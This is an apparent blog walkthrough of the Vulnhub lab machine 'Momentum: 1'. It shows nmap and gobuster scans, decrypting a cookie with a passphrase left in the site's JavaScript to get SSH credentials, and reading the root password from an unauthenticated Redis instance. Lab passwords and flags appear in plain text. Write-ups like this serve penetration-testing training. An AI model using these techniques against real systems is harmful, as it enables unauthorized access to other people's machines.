Momentum Vulnhub Walkthrough
In this write-up, we will be solving Momentum: 1 from Vulnhub. This machine is rated easy and was created by @AL1ENUM. It takes us through abusing a decryption routine left in the site's JavaScript to recover the SSH credentials, and then reading the root password out of an unauthenticated Redis instance with redis-cli.
Initial Enumeration and User Shell
I started the initial enumeration by running a port scan using nmap to look for open ports and default scripts.
┌──(madhav㉿kali)-[~/ctf/vulnhub/momentum1]
└─$ nmap -sC -sV -oN nmap/initial 192.168.29.186
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 10:28 IST
Nmap scan report for 192.168.29.186
Host is up (0.015s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5c:8e:2c:cc:c1:b0:3e:7c:0e:22:34:d8:60:31:4e:62 (RSA)
| 256 81:fd:c6:4c:5a:50:0a:27:ea:83:38:64:b9:8b:bd:c1 (ECDSA)
|_ 256 c1:8f:87:c1:52:09:27:60:5f:2e:2d:e0:08:03:72:c8 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Momentum | Index
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
Only two ports are open, so let's start the enumeration by visiting port 80 in a web browser.
There is nothing interesting on the landing page, so next I ran a gobuster scan to search for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/vulnhub/momentum1]
└─$ gobuster dir -u http://192.168.29.186 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.29.186
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/17 10:31:26 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 314] [--> http://192.168.29.186/img/]
/css (Status: 301) [Size: 314] [--> http://192.168.29.186/css/]
/manual (Status: 301) [Size: 317] [--> http://192.168.29.186/manual/]
/js (Status: 301) [Size: 313] [--> http://192.168.29.186/js/]
/server-status (Status: 403) [Size: 279]
===============================================================
2021/06/17 10:35:13 Finished
===============================================================
There are some common source directories. It's always good to read the client-side source to find vulnerabilities. I visited the /js directory, which has a file named main.js that contains some useful information.
function viewDetails(str) {
window.location.href = "opus-details.php?id="+str;
}
/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/
Here we have a page named opus-details.php with a parameter id. I visited the page and checked for LFI and RCE, but neither worked.
But when I checked the document cookies, I saw a cookie that is set after visiting opus-details.php.
This cookie looks like an encrypted string. So now we have a decryption routine, a secret passphrase and a ciphertext, all handed to us by the application. Let's head over to jsfiddle.net and try to decrypt it.
I imported the CryptoJS Library in the HTML:
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>
</head>
And then decrypted the ciphertext using the following JS:
var encrypted = "U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt";
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
After running the code we get the output auxerre-alienum##.
This is the SSH login password: we can log in via SSH with the username auxerre and the password auxerre-alienum##.
After logging in, we can read our first flag present in the home directory of user auxerre.
┌──(madhav㉿kali)-[~/ctf/vulnhub/momentum1]
└─$ ssh auxerre@192.168.29.186
auxerre@192.168.29.186's password:
Linux Momentum 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 08:47:31 2021
auxerre@Momentum:~$ ls
user.txt
auxerre@Momentum:~$ cat user.txt
[ Momentum - User Owned ]
---------------------------------------
flag : 84157165c30ad34d18945b647ec7f647
---------------------------------------
Root Shell
I tried running some Linux enumeration scripts but did not find anything interesting; I also checked for SUID binaries but found nothing useful.
Next, I looked for listening ports using the ss command and found a service bound only to localhost.
auxerre@Momentum:~$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:6379 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::1]:6379 [::]:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
Port 6379 is the default Redis port, and the instance is listening on loopback only. We can connect to it using the redis-cli command; no password is requested.
auxerre@Momentum:~$ redis-cli
127.0.0.1:6379> KEYS *
1) "rootpass"
We have a key named rootpass. When we read it, we get the login password for the root user.
127.0.0.1:6379> GET rootpass
"m0mentum-al1enum##"
Now we can use the su command to switch to root and read our final flag.
auxerre@Momentum:~$ su root
Password:
root@Momentum:/home/auxerre# cd
root@Momentum:~# cat root.txt
[ Momentum - Rooted ]
---------------------------------------
Flag : 658ff660fdac0b079ea78238e5996e40
---------------------------------------
by alienum with <3
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!